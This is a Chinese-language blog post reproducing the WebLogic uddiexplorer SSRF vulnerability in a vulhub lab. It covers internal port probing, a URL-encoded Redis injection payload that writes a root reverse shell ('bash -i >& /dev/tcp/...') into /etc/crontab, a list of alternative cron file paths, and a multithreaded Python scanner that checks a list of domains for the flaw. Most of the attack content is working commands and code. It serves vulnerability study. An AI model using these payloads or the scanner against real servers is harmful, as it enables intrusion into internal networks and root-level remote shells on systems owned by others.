Weblogic-SSRF-漏洞复现

Posted on | In

关于SSRF漏洞的原理以及利用已经记录过了,可以访问https://www.jianshu.com/p/6bf7700139fa查看,这次复现一下这个漏洞

本次还是利用vulhub进行漏洞复现

测试环境搭建

docker-compose build
docker-compose up -d

访问http://本地ip:7001/uddiexplorer/,即可查看uddiexplorer应用
1.png

漏洞测试

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,提交参数值为url:port,根据返回错误不同,可对内网状态进行探测如端口开放状态等

  1. 访问一个可以访问的ip:port,一般返回一个状态码,The server at http://192.168.60.168:7001/ returned a 404 error code (Not Found)如图
    2.png

  2. 访问一个不存在的端口,将返回but could not connect over HTTP to server
    3.png

  3. 访问一个非http协议,则返回did not have a valid SOAP content-type
    4.png

注入HTTP头,利用Redis的反弹shell

通过SSRF探测内网中的Redis的服务器,如图,172.18.0.2:6379可以连通
5.png
发送三条Redis的命令,将反弹shell脚本写入/etc/crontab

set 1 “\n\n\n\n * root bash -i >& /dev/tcp/监听ip/port 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save

对命令进行URL编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn%20%20%20%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F监听ip%2FPort%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D

攻击机开启监听,将URL编码后的字符串放在SSRF的域名后面发送,成功反弹shell
6.png

补充:

  • / etc / crontab这个是肯定的
  • /etc/cron.d/*将任意文件写到该目录下,效果和crontab相同,格式也要和/ etc / crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行反弹。
  • / var / spool / cron / root centos系统下root用户的cron文件
  • / var / spool / cron / crontabs / root debian系统下root用户的cron文件

附上大佬weblogic ssrf检测脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/env python  
# -*- coding: utf-8 -*-

import re
import sys
import Queue
import requests
import threading

from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

queue = Queue.Queue()
mutex = threading.Lock()

class Weblogic_SSRF_Check(threading.Thread):
    """docstring for Weblogic_SSRF_Check"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def check(self,domain,ip):
        payload = "uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".format(ip=ip)
        url = domain + payload

        try:
            html = requests.get(url=url, timeout=15, verify=False).content

            m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException',html)
            if m:
                mutex.acquire()
                with open('ssrf.txt','a+') as f:
                    print "%s has weblogic ssrf." % domain
                    f.write("%s has weblogic ssrf.\n" % domain)
                mutex.release()
        except Exception,e:
            pass

    def get_registry(self,domain):
        payload = 'uddiexplorer/SetupUDDIExplorer.jsp'
        url = domain + payload

        try:
            html = requests.get(url=url, timeout=15, verify=False).content
            m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html)
            if m:
                return m.group(1)
        except Exception,e:
            pass

    def run(self):
        while not self.queue.empty():
            domain = self.queue.get()
            mutex.acquire()
            print domain
            mutex.release()
            ip = self.get_registry(domain)
            self.check(domain,ip)

            self.queue.task_done()

# domain.txt 存放要检测的ip
if __name__ == '__main__':
    with open('domain.txt','r') as f:
        lines = f.readlines()
    for line in lines:
        queue.put(line.strip())

    for x in xrange(1,50):
        t = Weblogic_SSRF_Check(queue)
        t.setDaemon(True)
        t.start()
    queue.join()

7.png


参考链接:
http://wyb0.com/posts/weblogic-ssrf-check/
https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf